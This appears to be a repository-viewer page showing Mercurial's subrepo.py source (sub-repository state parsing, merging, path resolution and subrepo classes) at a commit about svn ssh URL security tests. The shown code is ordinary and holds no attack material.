##// END OF EJS Templates
subrepo: add tests for svn rogue ssh urls (SEC)...
Sean Farley -
r33730:60ee7af2 stable
parent child Browse files
Show More
@@ -1,1995 +1,1999 b''
1 # subrepo.py - sub-repository handling for Mercurial
1 # subrepo.py - sub-repository handling for Mercurial
2 #
2 #
3 # Copyright 2009-2010 Matt Mackall <mpm@selenic.com>
3 # Copyright 2009-2010 Matt Mackall <mpm@selenic.com>
4 #
4 #
5 # This software may be used and distributed according to the terms of the
5 # This software may be used and distributed according to the terms of the
6 # GNU General Public License version 2 or any later version.
6 # GNU General Public License version 2 or any later version.
7
7
8 from __future__ import absolute_import
8 from __future__ import absolute_import
9
9
10 import copy
10 import copy
11 import errno
11 import errno
12 import hashlib
12 import hashlib
13 import os
13 import os
14 import posixpath
14 import posixpath
15 import re
15 import re
16 import stat
16 import stat
17 import subprocess
17 import subprocess
18 import sys
18 import sys
19 import tarfile
19 import tarfile
20 import xml.dom.minidom
20 import xml.dom.minidom
21
21
22
22
23 from .i18n import _
23 from .i18n import _
24 from . import (
24 from . import (
25 cmdutil,
25 cmdutil,
26 config,
26 config,
27 encoding,
27 encoding,
28 error,
28 error,
29 exchange,
29 exchange,
30 filemerge,
30 filemerge,
31 match as matchmod,
31 match as matchmod,
32 node,
32 node,
33 pathutil,
33 pathutil,
34 phases,
34 phases,
35 pycompat,
35 pycompat,
36 scmutil,
36 scmutil,
37 util,
37 util,
38 vfs as vfsmod,
38 vfs as vfsmod,
39 )
39 )
40
40
# 'hg' is imported lazily (see subrepo()/nullsubrepo()) to break the
# circular dependency between this module and mercurial.hg.
hg = None
propertycache = util.propertycache

# State tuple (source, revision, kind) describing an absent subrepo.
nullstate = ('', '', 'empty')
45
45
def _expandedabspath(path):
    '''
    get a path or url and if it is a path expand it and return an absolute path
    '''
    # Resolve user/env references first, then decide whether this is a URL.
    expanded = util.urllocalpath(util.expandpath(path))
    u = util.url(expanded)
    if u.scheme:
        # Remote URLs (http://, ssh://, ...) are returned untouched.
        return path
    return util.normpath(os.path.abspath(u.path))
55
55
def _getstorehashcachename(remotepath):
    '''get a unique filename for the store hash cache of a remote repository'''
    # Hash the canonicalized path so equivalent spellings of the same
    # remote share one cache file; 12 hex digits is plenty of entropy.
    digest = hashlib.sha1(_expandedabspath(remotepath)).hexdigest()
    return digest[:12]
59
59
class SubrepoAbort(error.Abort):
    """Exception class used to avoid handling a subrepo error more than once"""

    def __init__(self, *args, **kw):
        # Pull out our private keywords before delegating, since
        # error.Abort does not know about them.
        self.subrepo = kw.pop('subrepo', None)
        self.cause = kw.pop('cause', None)
        error.Abort.__init__(self, *args, **kw)
66
66
def annotatesubrepoerror(func):
    """Decorator annotating error.Abort raised by *func* with the subrepo path.

    A plain error.Abort escaping the wrapped method is re-raised as a
    SubrepoAbort with '(in subrepository "...")' appended, so the user can
    tell which subrepo failed.  A SubrepoAbort is passed through untouched
    to avoid annotating the same failure twice.
    """
    def decoratedmethod(self, *args, **kargs):
        try:
            res = func(self, *args, **kargs)
        except SubrepoAbort as ex:
            # This exception has already been handled
            raise ex
        except error.Abort as ex:
            subrepo = subrelpath(self)
            errormsg = str(ex) + ' ' + _('(in subrepository "%s")') % subrepo
            # avoid handling this exception by raising a SubrepoAbort exception
            raise SubrepoAbort(errormsg, hint=ex.hint, subrepo=subrepo,
                               cause=sys.exc_info())
        return res
    return decoratedmethod
82
82
def state(ctx, ui):
    """return a state dict, mapping subrepo paths configured in .hgsub
    to tuple: (source from .hgsub, revision from .hgsubstate, kind
    (key in types dict))
    """
    p = config.config()
    repo = ctx.repo()
    def read(f, sections=None, remap=None):
        # Parse a spec file from the context; 'read' is passed back to
        # config.parse so %include directives recurse through here.
        if f in ctx:
            try:
                data = ctx[f].data()
            except IOError as err:
                if err.errno != errno.ENOENT:
                    raise
                # handle missing subrepo spec files as removed
                ui.warn(_("warning: subrepo spec file \'%s\' not found\n") %
                        repo.pathto(f))
                return
            p.parse(f, data, sections, remap, read)
        else:
            raise error.Abort(_("subrepo spec file \'%s\' not found") %
                              repo.pathto(f))
    if '.hgsub' in ctx:
        read('.hgsub')

    # Per-user [subpaths] config overrides/augments patterns from .hgsub.
    for path, src in ui.configitems('subpaths'):
        p.set('subpaths', path, src, ui.configsource('subpaths', path))

    # Map subrepo path -> pinned revision, from .hgsubstate lines of the
    # form "<revision> <path>".
    rev = {}
    if '.hgsubstate' in ctx:
        try:
            for i, l in enumerate(ctx['.hgsubstate'].data().splitlines()):
                l = l.lstrip()
                if not l:
                    continue
                try:
                    revision, path = l.split(" ", 1)
                except ValueError:
                    raise error.Abort(_("invalid subrepository revision "
                                        "specifier in \'%s\' line %d")
                                      % (repo.pathto('.hgsubstate'), (i + 1)))
                rev[path] = revision
        except IOError as err:
            if err.errno != errno.ENOENT:
                raise

    def remap(src):
        # Apply each [subpaths] pattern (first match substitution only).
        for pattern, repl in p.items('subpaths'):
            # Turn r'C:\foo\bar' into r'C:\\foo\\bar' since re.sub
            # does a string decode.
            repl = util.escapestr(repl)
            # However, we still want to allow back references to go
            # through unharmed, so we turn r'\\1' into r'\1'. Again,
            # extra escapes are needed because re.sub string decodes.
            repl = re.sub(r'\\\\([0-9]+)', r'\\\1', repl)
            try:
                src = re.sub(pattern, repl, src, 1)
            except re.error as e:
                raise error.Abort(_("bad subrepository pattern in %s: %s")
                                  % (p.source('subpaths', pattern), e))
        return src

    state = {}
    for path, src in p[''].items():
        kind = 'hg'
        # An explicit kind prefix looks like "[git]src" / "[svn]src".
        if src.startswith('['):
            if ']' not in src:
                raise error.Abort(_('missing ] in subrepository source'))
            kind, src = src.split(']', 1)
            kind = kind[1:]
            src = src.lstrip() # strip any extra whitespace after ']'

        if not util.url(src).isabs():
            parent = _abssource(repo, abort=False)
            if parent:
                parent = util.url(parent)
                parent.path = posixpath.join(parent.path or '', src)
                parent.path = posixpath.normpath(parent.path)
                joined = str(parent)
                # Remap the full joined path and use it if it changes,
                # else remap the original source.
                remapped = remap(joined)
                if remapped == joined:
                    src = remap(src)
                else:
                    src = remapped

        src = remap(src)
        state[util.pconvert(path)] = (src.strip(), rev.get(path, ''), kind)

    return state
174
174
def writestate(repo, state):
    """rewrite .hgsubstate in (outer) repo with these subrepo states"""
    # Emit one "<revision> <path>" line per subrepo, sorted by path;
    # subrepos sitting at the null revision are omitted entirely.
    lines = []
    for subpath in sorted(state):
        revision = state[subpath][1]
        if revision != nullstate[1]:
            lines.append('%s %s\n' % (revision, subpath))
    repo.wwrite('.hgsubstate', ''.join(lines), '')
180
180
def submerge(repo, wctx, mctx, actx, overwrite, labels=None):
    """delegated from merge.applyupdates: merging of .hgsubstate file
    in working context, merging context and ancestor context"""
    if mctx == actx: # backwards?
        actx = wctx.p1()
    s1 = wctx.substate
    s2 = mctx.substate
    sa = actx.substate
    sm = {}  # merged substate being accumulated; written out at the end

    repo.ui.debug("subrepo merge %s %s %s\n" % (wctx, mctx, actx))

    def debug(s, msg, r=""):
        # r, when given, is a (source, revision, kind) state tuple.
        if r:
            r = "%s:%s:%s" % r
        repo.ui.debug("  subrepo %s: %s %s\n" % (s, msg, r))

    promptssrc = filemerge.partextras(labels)
    # First pass: every subrepo present locally.
    for s, l in sorted(s1.iteritems()):
        prompts = None
        a = sa.get(s, nullstate)
        ld = l # local state with possible dirty flag for compares
        if wctx.sub(s).dirty():
            # NOTE: ld becomes a 2-tuple here, so it can never compare
            # equal to a 3-tuple state -- a dirty subrepo never matches.
            ld = (l[0], l[1] + "+")
        if wctx == actx: # overwrite
            a = ld

        prompts = promptssrc.copy()
        prompts['s'] = s
        if s in s2:
            r = s2[s]
            if ld == r or r == a: # no change or local is newer
                sm[s] = l
                continue
            elif ld == a: # other side changed
                debug(s, "other changed, get", r)
                wctx.sub(s).get(r, overwrite)
                sm[s] = r
            elif ld[0] != r[0]: # sources differ
                prompts['lo'] = l[0]
                prompts['ro'] = r[0]
                if repo.ui.promptchoice(
                    _(' subrepository sources for %(s)s differ\n'
                      'use (l)ocal%(l)s source (%(lo)s)'
                      ' or (r)emote%(o)s source (%(ro)s)?'
                      '$$ &Local $$ &Remote') % prompts, 0):
                    debug(s, "prompt changed, get", r)
                    wctx.sub(s).get(r, overwrite)
                    sm[s] = r
            elif ld[1] == a[1]: # local side is unchanged
                debug(s, "other side changed, get", r)
                wctx.sub(s).get(r, overwrite)
                sm[s] = r
            else:
                # Both sides moved the subrepo to different revisions:
                # ask the user to merge, keep local, or keep remote.
                debug(s, "both sides changed")
                srepo = wctx.sub(s)
                prompts['sl'] = srepo.shortid(l[1])
                prompts['sr'] = srepo.shortid(r[1])
                option = repo.ui.promptchoice(
                    _(' subrepository %(s)s diverged (local revision: %(sl)s, '
                      'remote revision: %(sr)s)\n'
                      '(M)erge, keep (l)ocal%(l)s or keep (r)emote%(o)s?'
                      '$$ &Merge $$ &Local $$ &Remote')
                    % prompts, 0)
                if option == 0:
                    wctx.sub(s).merge(r)
                    sm[s] = l
                    debug(s, "merge with", r)
                elif option == 1:
                    sm[s] = l
                    debug(s, "keep local subrepo revision", l)
                else:
                    wctx.sub(s).get(r, overwrite)
                    sm[s] = r
                    debug(s, "get remote subrepo revision", r)
        elif ld == a: # remote removed, local unchanged
            debug(s, "remote removed, remove")
            wctx.sub(s).remove()
        elif a == nullstate: # not present in remote or ancestor
            debug(s, "local added, keep")
            sm[s] = l
            continue
        else:
            # Local changed a subrepo the remote deleted: let the user pick.
            if repo.ui.promptchoice(
                _(' local%(l)s changed subrepository %(s)s'
                  ' which remote%(o)s removed\n'
                  'use (c)hanged version or (d)elete?'
                  '$$ &Changed $$ &Delete') % prompts, 0):
                debug(s, "prompt remove")
                wctx.sub(s).remove()

    # Second pass: subrepos only present on the remote side.
    for s, r in sorted(s2.items()):
        prompts = None
        if s in s1:
            continue
        elif s not in sa:
            debug(s, "remote added, get", r)
            mctx.sub(s).get(r)
            sm[s] = r
        elif r != sa[s]:
            # Remote changed a subrepo the local side deleted.
            prompts = promptssrc.copy()
            prompts['s'] = s
            if repo.ui.promptchoice(
                _(' remote%(o)s changed subrepository %(s)s'
                  ' which local%(l)s removed\n'
                  'use (c)hanged version or (d)elete?'
                  '$$ &Changed $$ &Delete') % prompts, 0) == 0:
                debug(s, "prompt recreate", r)
                mctx.sub(s).get(r)
                sm[s] = r

    # record merged .hgsubstate
    writestate(repo, sm)
    return sm
295
295
def _updateprompt(ui, sub, dirty, local, remote):
    """Ask the user to pick the local or remote subrepo source.

    Returns 0 to keep local, 1 to take remote (ui.promptchoice semantics).
    """
    # Pick the message template first, then apply the arguments once.
    if dirty:
        template = _(' subrepository sources for %s differ\n'
                     'use (l)ocal source (%s) or (r)emote source (%s)?'
                     '$$ &Local $$ &Remote')
    else:
        template = _(' subrepository sources for %s differ (in checked out '
                     'version)\n'
                     'use (l)ocal source (%s) or (r)emote source (%s)?'
                     '$$ &Local $$ &Remote')
    msg = template % (subrelpath(sub), local, remote)
    return ui.promptchoice(msg, 0)
309
309
def reporelpath(repo):
    """return path to this (sub)repo as seen from outermost repo"""
    # Climb the _subparent chain until we reach the outermost repository.
    outer = repo
    while util.safehasattr(outer, '_subparent'):
        outer = outer._subparent
    # Strip the normalized outermost root prefix from our own root.
    return repo.root[len(pathutil.normasprefix(outer.root)):]
316
316
def subrelpath(sub):
    """Return the path of *sub* relative to the outermost repository."""
    return sub._relpath
320
320
def _abssource(repo, push=False, abort=True):
    """return pull/push path of repo - either based on parent repo .hgsub info
    or on the top repo config. Abort or return None if no source found."""
    if util.safehasattr(repo, '_subparent'):
        # We are inside a subrepo: resolve our recorded source against
        # the parent's own source, recursing toward the top repo.
        source = util.url(repo._subsource)
        if source.isabs():
            return str(source)
        source.path = posixpath.normpath(source.path)
        parent = _abssource(repo._subparent, push, abort=False)
        if parent:
            parent = util.url(util.pconvert(parent))
            parent.path = posixpath.join(parent.path or '', source.path)
            parent.path = posixpath.normpath(parent.path)
            return str(parent)
    else: # recursion reached top repo
        if util.safehasattr(repo, '_subtoppath'):
            # push/pull in progress: use the path the operation targets
            return repo._subtoppath
        if push and repo.ui.config('paths', 'default-push'):
            return repo.ui.config('paths', 'default-push')
        if repo.ui.config('paths', 'default'):
            return repo.ui.config('paths', 'default')
        if repo.shared():
            # chop off the .hg component to get the default path form
            return os.path.dirname(repo.sharedpath)
    if abort:
        raise error.Abort(_("default path for subrepository not found"))
347
347
def _sanitize(ui, vfs, ignore):
    """Delete potentially hostile .hg/hgrc files from a non-hg subrepo.

    Walks the checkout under *vfs*, pruning directories named *ignore*
    (e.g. '.git' or '.svn'), and removes any 'hgrc' found inside a '.hg'
    directory, warning the user: such a file could inject configuration
    into the enclosing Mercurial repository.
    """
    for dirname, dirs, names in vfs.walk():
        for i, d in enumerate(dirs):
            if d.lower() == ignore:
                # prune in place so walk() does not descend into it;
                # break immediately after mutating the list we iterate
                del dirs[i]
                break
        if vfs.basename(dirname).lower() != '.hg':
            continue
        for f in names:
            if f.lower() == 'hgrc':
                ui.warn(_("warning: removing potentially hostile 'hgrc' "
                          "in '%s'\n") % vfs.join(dirname))
                vfs.unlink(vfs.reljoin(dirname, f))
361
361
def subrepo(ctx, path, allowwdir=False, allowcreate=True):
    """return instance of the right subrepo class for subrepo in path"""
    # subrepo inherently violates our import layering rules
    # because it wants to make repo objects from deep inside the stack
    # so we manually delay the circular imports to not break
    # scripts that don't use our demand-loading
    global hg
    from . import hg as h
    hg = h

    # refuse paths escaping the repository before doing anything else
    pathutil.pathauditor(ctx.repo().root)(path)
    state = ctx.substate[path]
    kind = state[2]
    if kind not in types:
        raise error.Abort(_('unknown subrepo type %s') % kind)
    if allowwdir:
        # substitute the working-directory revision for the recorded one
        state = (state[0], ctx.subrev(path), kind)
    return types[kind](ctx, path, state[:2], allowcreate)
379
379
def nullsubrepo(ctx, path, pctx):
    """return an empty subrepo in pctx for the extant subrepo in ctx"""
    # subrepo inherently violates our import layering rules
    # because it wants to make repo objects from deep inside the stack
    # so we manually delay the circular imports to not break
    # scripts that don't use our demand-loading
    global hg
    from . import hg as h
    hg = h

    # refuse paths escaping the repository before doing anything else
    pathutil.pathauditor(ctx.repo().root)(path)
    state = ctx.substate[path]
    kind = state[2]
    if kind not in types:
        raise error.Abort(_('unknown subrepo type %s') % kind)
    # hg subrepos use the 40-digit null hex revision; other kinds use ''
    subrev = "0" * 40 if kind == 'hg' else ''
    return types[kind](pctx, path, (state[0], subrev), True)
398
398
def newcommitphase(ui, ctx):
    """Return the phase a new commit of *ctx* should use, honoring
    the phases.checksubrepos policy ('ignore', 'follow' or 'abort').

    With 'follow', the commit inherits the highest phase found among its
    subrepos; with 'abort', a subrepo in a higher phase raises Abort.
    """
    commitphase = phases.newcommitphase(ui)
    substate = getattr(ctx, "substate", None)
    if not substate:
        # no subrepos involved: plain default phase applies
        return commitphase
    check = ui.config('phases', 'checksubrepos')
    if check not in ('ignore', 'follow', 'abort'):
        raise error.Abort(_('invalid phases.checksubrepos configuration: %s')
                          % (check))
    if check == 'ignore':
        return commitphase
    # find the highest (most private) phase among all subrepo revisions
    maxphase = phases.public
    maxsub = None
    for s in sorted(substate):
        sub = ctx.sub(s)
        subphase = sub.phase(substate[s][1])
        if maxphase < subphase:
            maxphase = subphase
            maxsub = s
    if commitphase < maxphase:
        if check == 'abort':
            raise error.Abort(_("can't commit in %s phase"
                                " conflicting %s from subrepository %s") %
                              (phases.phasenames[commitphase],
                               phases.phasenames[maxphase], maxsub))
        ui.warn(_("warning: changes are committed in"
                  " %s phase from subrepository %s\n") %
                (phases.phasenames[maxphase], maxsub))
        return maxphase
    return commitphase
429
429
430 # subrepo classes need to implement the following abstract class:
430 # subrepo classes need to implement the following abstract class:
431
431
432 class abstractsubrepo(object):
432 class abstractsubrepo(object):
433
433
434 def __init__(self, ctx, path):
434 def __init__(self, ctx, path):
435 """Initialize abstractsubrepo part
435 """Initialize abstractsubrepo part
436
436
437 ``ctx`` is the context referring this subrepository in the
437 ``ctx`` is the context referring this subrepository in the
438 parent repository.
438 parent repository.
439
439
440 ``path`` is the path to this subrepository as seen from
440 ``path`` is the path to this subrepository as seen from
441 innermost repository.
441 innermost repository.
442 """
442 """
443 self.ui = ctx.repo().ui
443 self.ui = ctx.repo().ui
444 self._ctx = ctx
444 self._ctx = ctx
445 self._path = path
445 self._path = path
446
446
447 def addwebdirpath(self, serverpath, webconf):
447 def addwebdirpath(self, serverpath, webconf):
448 """Add the hgwebdir entries for this subrepo, and any of its subrepos.
448 """Add the hgwebdir entries for this subrepo, and any of its subrepos.
449
449
450 ``serverpath`` is the path component of the URL for this repo.
450 ``serverpath`` is the path component of the URL for this repo.
451
451
452 ``webconf`` is the dictionary of hgwebdir entries.
452 ``webconf`` is the dictionary of hgwebdir entries.
453 """
453 """
454 pass
454 pass
455
455
456 def storeclean(self, path):
456 def storeclean(self, path):
457 """
457 """
458 returns true if the repository has not changed since it was last
458 returns true if the repository has not changed since it was last
459 cloned from or pushed to a given repository.
459 cloned from or pushed to a given repository.
460 """
460 """
461 return False
461 return False
462
462
463 def dirty(self, ignoreupdate=False, missing=False):
463 def dirty(self, ignoreupdate=False, missing=False):
464 """returns true if the dirstate of the subrepo is dirty or does not
464 """returns true if the dirstate of the subrepo is dirty or does not
465 match current stored state. If ignoreupdate is true, only check
465 match current stored state. If ignoreupdate is true, only check
466 whether the subrepo has uncommitted changes in its dirstate. If missing
466 whether the subrepo has uncommitted changes in its dirstate. If missing
467 is true, check for deleted files.
467 is true, check for deleted files.
468 """
468 """
469 raise NotImplementedError
469 raise NotImplementedError
470
470
471 def dirtyreason(self, ignoreupdate=False, missing=False):
471 def dirtyreason(self, ignoreupdate=False, missing=False):
472 """return reason string if it is ``dirty()``
472 """return reason string if it is ``dirty()``
473
473
474 Returned string should have enough information for the message
474 Returned string should have enough information for the message
475 of exception.
475 of exception.
476
476
477 This returns None, otherwise.
477 This returns None, otherwise.
478 """
478 """
479 if self.dirty(ignoreupdate=ignoreupdate, missing=missing):
479 if self.dirty(ignoreupdate=ignoreupdate, missing=missing):
480 return _('uncommitted changes in subrepository "%s"'
480 return _('uncommitted changes in subrepository "%s"'
481 ) % subrelpath(self)
481 ) % subrelpath(self)
482
482
483 def bailifchanged(self, ignoreupdate=False, hint=None):
483 def bailifchanged(self, ignoreupdate=False, hint=None):
484 """raise Abort if subrepository is ``dirty()``
484 """raise Abort if subrepository is ``dirty()``
485 """
485 """
486 dirtyreason = self.dirtyreason(ignoreupdate=ignoreupdate,
486 dirtyreason = self.dirtyreason(ignoreupdate=ignoreupdate,
487 missing=True)
487 missing=True)
488 if dirtyreason:
488 if dirtyreason:
489 raise error.Abort(dirtyreason, hint=hint)
489 raise error.Abort(dirtyreason, hint=hint)
490
490
491 def basestate(self):
491 def basestate(self):
492 """current working directory base state, disregarding .hgsubstate
492 """current working directory base state, disregarding .hgsubstate
493 state and working directory modifications"""
493 state and working directory modifications"""
494 raise NotImplementedError
494 raise NotImplementedError
495
495
496 def checknested(self, path):
496 def checknested(self, path):
497 """check if path is a subrepository within this repository"""
497 """check if path is a subrepository within this repository"""
498 return False
498 return False
499
499
500 def commit(self, text, user, date):
500 def commit(self, text, user, date):
501 """commit the current changes to the subrepo with the given
501 """commit the current changes to the subrepo with the given
502 log message. Use given user and date if possible. Return the
502 log message. Use given user and date if possible. Return the
503 new state of the subrepo.
503 new state of the subrepo.
504 """
504 """
505 raise NotImplementedError
505 raise NotImplementedError
506
506
507 def phase(self, state):
507 def phase(self, state):
508 """returns phase of specified state in the subrepository.
508 """returns phase of specified state in the subrepository.
509 """
509 """
510 return phases.public
510 return phases.public
511
511
512 def remove(self):
512 def remove(self):
513 """remove the subrepo
513 """remove the subrepo
514
514
515 (should verify the dirstate is not dirty first)
515 (should verify the dirstate is not dirty first)
516 """
516 """
517 raise NotImplementedError
517 raise NotImplementedError
518
518
519 def get(self, state, overwrite=False):
519 def get(self, state, overwrite=False):
520 """run whatever commands are needed to put the subrepo into
520 """run whatever commands are needed to put the subrepo into
521 this state
521 this state
522 """
522 """
523 raise NotImplementedError
523 raise NotImplementedError
524
524
525 def merge(self, state):
525 def merge(self, state):
526 """merge currently-saved state with the new state."""
526 """merge currently-saved state with the new state."""
527 raise NotImplementedError
527 raise NotImplementedError
528
528
529 def push(self, opts):
529 def push(self, opts):
530 """perform whatever action is analogous to 'hg push'
530 """perform whatever action is analogous to 'hg push'
531
531
532 This may be a no-op on some systems.
532 This may be a no-op on some systems.
533 """
533 """
534 raise NotImplementedError
534 raise NotImplementedError
535
535
536 def add(self, ui, match, prefix, explicitonly, **opts):
536 def add(self, ui, match, prefix, explicitonly, **opts):
537 return []
537 return []
538
538
539 def addremove(self, matcher, prefix, opts, dry_run, similarity):
539 def addremove(self, matcher, prefix, opts, dry_run, similarity):
540 self.ui.warn("%s: %s" % (prefix, _("addremove is not supported")))
540 self.ui.warn("%s: %s" % (prefix, _("addremove is not supported")))
541 return 1
541 return 1
542
542
543 def cat(self, match, fm, fntemplate, prefix, **opts):
543 def cat(self, match, fm, fntemplate, prefix, **opts):
544 return 1
544 return 1
545
545
546 def status(self, rev2, **opts):
546 def status(self, rev2, **opts):
547 return scmutil.status([], [], [], [], [], [], [])
547 return scmutil.status([], [], [], [], [], [], [])
548
548
549 def diff(self, ui, diffopts, node2, match, prefix, **opts):
549 def diff(self, ui, diffopts, node2, match, prefix, **opts):
550 pass
550 pass
551
551
552 def outgoing(self, ui, dest, opts):
552 def outgoing(self, ui, dest, opts):
553 return 1
553 return 1
554
554
555 def incoming(self, ui, source, opts):
555 def incoming(self, ui, source, opts):
556 return 1
556 return 1
557
557
558 def files(self):
558 def files(self):
559 """return filename iterator"""
559 """return filename iterator"""
560 raise NotImplementedError
560 raise NotImplementedError
561
561
562 def filedata(self, name, decode):
562 def filedata(self, name, decode):
563 """return file data, optionally passed through repo decoders"""
563 """return file data, optionally passed through repo decoders"""
564 raise NotImplementedError
564 raise NotImplementedError
565
565
566 def fileflags(self, name):
566 def fileflags(self, name):
567 """return file flags"""
567 """return file flags"""
568 return ''
568 return ''
569
569
570 def getfileset(self, expr):
570 def getfileset(self, expr):
571 """Resolve the fileset expression for this repo"""
571 """Resolve the fileset expression for this repo"""
572 return set()
572 return set()
573
573
574 def printfiles(self, ui, m, fm, fmt, subrepos):
574 def printfiles(self, ui, m, fm, fmt, subrepos):
575 """handle the files command for this subrepo"""
575 """handle the files command for this subrepo"""
576 return 1
576 return 1
577
577
578 def archive(self, archiver, prefix, match=None, decode=True):
578 def archive(self, archiver, prefix, match=None, decode=True):
579 if match is not None:
579 if match is not None:
580 files = [f for f in self.files() if match(f)]
580 files = [f for f in self.files() if match(f)]
581 else:
581 else:
582 files = self.files()
582 files = self.files()
583 total = len(files)
583 total = len(files)
584 relpath = subrelpath(self)
584 relpath = subrelpath(self)
585 self.ui.progress(_('archiving (%s)') % relpath, 0,
585 self.ui.progress(_('archiving (%s)') % relpath, 0,
586 unit=_('files'), total=total)
586 unit=_('files'), total=total)
587 for i, name in enumerate(files):
587 for i, name in enumerate(files):
588 flags = self.fileflags(name)
588 flags = self.fileflags(name)
589 mode = 'x' in flags and 0o755 or 0o644
589 mode = 'x' in flags and 0o755 or 0o644
590 symlink = 'l' in flags
590 symlink = 'l' in flags
591 archiver.addfile(prefix + self._path + '/' + name,
591 archiver.addfile(prefix + self._path + '/' + name,
592 mode, symlink, self.filedata(name, decode))
592 mode, symlink, self.filedata(name, decode))
593 self.ui.progress(_('archiving (%s)') % relpath, i + 1,
593 self.ui.progress(_('archiving (%s)') % relpath, i + 1,
594 unit=_('files'), total=total)
594 unit=_('files'), total=total)
595 self.ui.progress(_('archiving (%s)') % relpath, None)
595 self.ui.progress(_('archiving (%s)') % relpath, None)
596 return total
596 return total
597
597
598 def walk(self, match):
598 def walk(self, match):
599 '''
599 '''
600 walk recursively through the directory tree, finding all files
600 walk recursively through the directory tree, finding all files
601 matched by the match function
601 matched by the match function
602 '''
602 '''
603 pass
603 pass
604
604
605 def forget(self, match, prefix):
605 def forget(self, match, prefix):
606 return ([], [])
606 return ([], [])
607
607
608 def removefiles(self, matcher, prefix, after, force, subrepos, warnings):
608 def removefiles(self, matcher, prefix, after, force, subrepos, warnings):
609 """remove the matched files from the subrepository and the filesystem,
609 """remove the matched files from the subrepository and the filesystem,
610 possibly by force and/or after the file has been removed from the
610 possibly by force and/or after the file has been removed from the
611 filesystem. Return 0 on success, 1 on any warning.
611 filesystem. Return 0 on success, 1 on any warning.
612 """
612 """
613 warnings.append(_("warning: removefiles not implemented (%s)")
613 warnings.append(_("warning: removefiles not implemented (%s)")
614 % self._path)
614 % self._path)
615 return 1
615 return 1
616
616
617 def revert(self, substate, *pats, **opts):
617 def revert(self, substate, *pats, **opts):
618 self.ui.warn(_('%s: reverting %s subrepos is unsupported\n') \
618 self.ui.warn(_('%s: reverting %s subrepos is unsupported\n') \
619 % (substate[0], substate[2]))
619 % (substate[0], substate[2]))
620 return []
620 return []
621
621
622 def shortid(self, revid):
622 def shortid(self, revid):
623 return revid
623 return revid
624
624
625 def verify(self):
625 def verify(self):
626 '''verify the integrity of the repository. Return 0 on success or
626 '''verify the integrity of the repository. Return 0 on success or
627 warning, 1 on any error.
627 warning, 1 on any error.
628 '''
628 '''
629 return 0
629 return 0
630
630
631 @propertycache
631 @propertycache
632 def wvfs(self):
632 def wvfs(self):
633 """return vfs to access the working directory of this subrepository
633 """return vfs to access the working directory of this subrepository
634 """
634 """
635 return vfsmod.vfs(self._ctx.repo().wvfs.join(self._path))
635 return vfsmod.vfs(self._ctx.repo().wvfs.join(self._path))
636
636
637 @propertycache
637 @propertycache
638 def _relpath(self):
638 def _relpath(self):
639 """return path to this subrepository as seen from outermost repository
639 """return path to this subrepository as seen from outermost repository
640 """
640 """
641 return self.wvfs.reljoin(reporelpath(self._ctx.repo()), self._path)
641 return self.wvfs.reljoin(reporelpath(self._ctx.repo()), self._path)
642
642
643 class hgsubrepo(abstractsubrepo):
643 class hgsubrepo(abstractsubrepo):
644 def __init__(self, ctx, path, state, allowcreate):
644 def __init__(self, ctx, path, state, allowcreate):
645 super(hgsubrepo, self).__init__(ctx, path)
645 super(hgsubrepo, self).__init__(ctx, path)
646 self._state = state
646 self._state = state
647 r = ctx.repo()
647 r = ctx.repo()
648 root = r.wjoin(path)
648 root = r.wjoin(path)
649 create = allowcreate and not r.wvfs.exists('%s/.hg' % path)
649 create = allowcreate and not r.wvfs.exists('%s/.hg' % path)
650 self._repo = hg.repository(r.baseui, root, create=create)
650 self._repo = hg.repository(r.baseui, root, create=create)
651
651
652 # Propagate the parent's --hidden option
652 # Propagate the parent's --hidden option
653 if r is r.unfiltered():
653 if r is r.unfiltered():
654 self._repo = self._repo.unfiltered()
654 self._repo = self._repo.unfiltered()
655
655
656 self.ui = self._repo.ui
656 self.ui = self._repo.ui
657 for s, k in [('ui', 'commitsubrepos')]:
657 for s, k in [('ui', 'commitsubrepos')]:
658 v = r.ui.config(s, k)
658 v = r.ui.config(s, k)
659 if v:
659 if v:
660 self.ui.setconfig(s, k, v, 'subrepo')
660 self.ui.setconfig(s, k, v, 'subrepo')
661 # internal config: ui._usedassubrepo
661 # internal config: ui._usedassubrepo
662 self.ui.setconfig('ui', '_usedassubrepo', 'True', 'subrepo')
662 self.ui.setconfig('ui', '_usedassubrepo', 'True', 'subrepo')
663 self._initrepo(r, state[0], create)
663 self._initrepo(r, state[0], create)
664
664
665 @annotatesubrepoerror
665 @annotatesubrepoerror
666 def addwebdirpath(self, serverpath, webconf):
666 def addwebdirpath(self, serverpath, webconf):
667 cmdutil.addwebdirpath(self._repo, subrelpath(self), webconf)
667 cmdutil.addwebdirpath(self._repo, subrelpath(self), webconf)
668
668
669 def storeclean(self, path):
669 def storeclean(self, path):
670 with self._repo.lock():
670 with self._repo.lock():
671 return self._storeclean(path)
671 return self._storeclean(path)
672
672
673 def _storeclean(self, path):
673 def _storeclean(self, path):
674 clean = True
674 clean = True
675 itercache = self._calcstorehash(path)
675 itercache = self._calcstorehash(path)
676 for filehash in self._readstorehashcache(path):
676 for filehash in self._readstorehashcache(path):
677 if filehash != next(itercache, None):
677 if filehash != next(itercache, None):
678 clean = False
678 clean = False
679 break
679 break
680 if clean:
680 if clean:
681 # if not empty:
681 # if not empty:
682 # the cached and current pull states have a different size
682 # the cached and current pull states have a different size
683 clean = next(itercache, None) is None
683 clean = next(itercache, None) is None
684 return clean
684 return clean
685
685
686 def _calcstorehash(self, remotepath):
686 def _calcstorehash(self, remotepath):
687 '''calculate a unique "store hash"
687 '''calculate a unique "store hash"
688
688
689 This method is used to to detect when there are changes that may
689 This method is used to to detect when there are changes that may
690 require a push to a given remote path.'''
690 require a push to a given remote path.'''
691 # sort the files that will be hashed in increasing (likely) file size
691 # sort the files that will be hashed in increasing (likely) file size
692 filelist = ('bookmarks', 'store/phaseroots', 'store/00changelog.i')
692 filelist = ('bookmarks', 'store/phaseroots', 'store/00changelog.i')
693 yield '# %s\n' % _expandedabspath(remotepath)
693 yield '# %s\n' % _expandedabspath(remotepath)
694 vfs = self._repo.vfs
694 vfs = self._repo.vfs
695 for relname in filelist:
695 for relname in filelist:
696 filehash = hashlib.sha1(vfs.tryread(relname)).hexdigest()
696 filehash = hashlib.sha1(vfs.tryread(relname)).hexdigest()
697 yield '%s = %s\n' % (relname, filehash)
697 yield '%s = %s\n' % (relname, filehash)
698
698
699 @propertycache
699 @propertycache
700 def _cachestorehashvfs(self):
700 def _cachestorehashvfs(self):
701 return vfsmod.vfs(self._repo.vfs.join('cache/storehash'))
701 return vfsmod.vfs(self._repo.vfs.join('cache/storehash'))
702
702
703 def _readstorehashcache(self, remotepath):
703 def _readstorehashcache(self, remotepath):
